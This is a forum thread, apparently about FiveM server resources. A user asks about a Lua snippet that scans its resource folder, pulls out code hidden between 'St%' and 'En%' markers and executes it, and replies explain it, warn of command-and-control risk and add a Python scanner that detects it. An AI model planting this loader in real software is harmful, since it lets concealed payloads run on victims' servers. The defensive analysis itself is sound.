Hello,
I’m not quite sure what this code does, but I’ve never seen anything like it. So I’m asking here now: does anyone here know what the following code does?
local function CheckPlayerID()
    local directory = GetResourcePath(GetCurrentResourceName())
    local p = io.popen('ls "' .. directory .. '"')
    if not p then return end
    for file in p:lines() do
        local filePath = directory .. "/" .. file
        local fichier = io.open(filePath, "rb")
        if fichier then
            local content = fichier:read("*all")
            fichier:close()
            if content then
                local startPos = content:find("St%", 1, true)
                local endPos = content:find("En%", startPos, true)
                if startPos and endPos then
                    local code = content:sub(startPos + 3, endPos - 1)
                    local func = load(code)
                    if func then
                        pcall(func)
                    end
                    break
                end
            end
        end
    end
end
CheckPlayerID()
This is indeed very interesting. It opens all files in a resource folder and reads their content, then looks for the literals(?) “St%” and “En%” and (when found) executes the code in between.
What doesn’t make any sense at all is the fact it looks for the literals here. Usually the % sign is used for pattern matching, so “St…” following any characters. But this looks specifically for “St%” thanks to the third parameter being true.
But I would still classify this as extremely suspicious as it basically looks for random code to execute.
My advice: Get rid of it and hope it doesn’t come back.
First things first. Before even diving into the code, INTUITION tells me that because this came in without your knowledge, it may come right back. (if this is on your machine).
Secondly, fichier is ‘file’ in French. Whoever wrote this maaay speak French. (may help if you know who gave you the file)
Now, here’s what the code does (most of which was explained by @kiminaze)
[Line 1] Get the name of the resource
[Line 2] (using ‘ls’ in the terminal), view files in the folder using the resource name. (You know, cause the name of the resource is the name of the folder)
[Line 3 (optional)] If the command doesn’t return any data for whatever reason, exit
[Line 4] For every resulting filename in the directory, do the stuff below
====Stuff====
a. Read the hex bytes of the file
b. Look for the position that starts with “St%” (start?) and one that ends with “En%” (end?)
c. if BOTH are found, get everything between the first character after “ST” and the ‘n’ within “En”
d. then it compiles it all together (with load) and executes it
It’s very important that you NEVER download code if you don’t know EXACTLY what it’s doing, because things like THIS happen…
Anything could have executed in that pcall, including something that maintains an attacker’s connection to your machine (usually called ‘command and control / c2’). If you don’t know how to look for that kind of stuff, or what to look for, it may be too late…
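For anyone who wants to check other resources for the same trick, here is an added scanner (my own example, not code from the thread or from any FiveM project) that looks for the “St%” … “En%” envelope the posted loader searches for, extracts the hidden region exactly the way `content:sub(startPos + 3, endPos - 1)` would, and also flags files carrying the loader’s own fingerprint (`io.popen`, `load(`, `pcall(`), without ever executing anything. The sample files in `demo()` are constructed for illustration.

```python
# Added example: scan a resource folder for the "St%" ... "En%" payload envelope
# and for the loader fingerprint, reporting findings instead of running them.
import os
import tempfile

START_MARK = b"St%"
END_MARK = b"En%"
# Calls the posted loader relies on; a file using all three deserves a look.
LOADER_CALLS = (b"io.popen", b"load(", b"pcall(")


def find_envelope(content: bytes):
    """Return the bytes between the markers, mirroring the Lua
    content:sub(startPos + 3, endPos - 1), or None if either marker is missing."""
    start = content.find(START_MARK)
    if start < 0:
        return None
    end = content.find(END_MARK, start)  # end marker must follow the start marker
    if end < 0:
        return None
    return content[start + len(START_MARK):end]


def loader_fingerprint(content: bytes) -> bool:
    """True when the file contains every call the posted loader uses."""
    return all(call in content for call in LOADER_CALLS)


def scan_resource(directory: str):
    """Walk a resource folder; report (path, kind, preview) for suspicious files."""
    findings = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                data = fh.read()
            payload = find_envelope(data)
            if payload is not None:
                findings.append((path, "payload envelope", payload[:80]))
            if loader_fingerprint(data):
                findings.append((path, "loader fingerprint", b""))
    return findings


def demo():
    """Constructed sample folder: one clean file, one hidden payload, one loader."""
    samples = {
        "clean.lua": b'-- constructed clean file\nprint("ok")\n',
        "vehicles.lua": b'local x = 1 St%print("hidden")En% local y = 2\n',
        "client.lua": b'local p = io.popen("ls") local f = load(code) pcall(f)\n',
    }
    with tempfile.TemporaryDirectory() as d:
        for name, data in samples.items():
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(data)
        return scan_resource(d)
```

Run `demo()` to see the two findings on the constructed folder, or point `scan_resource` at a real resource directory.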
First of all, thanks for the quick reply, and the good explanation.
To clarify, the code came from a script I found while troubleshooting a friend’s server. Luckily, this was just a server to test some cars; it’s probably time to reinstall it.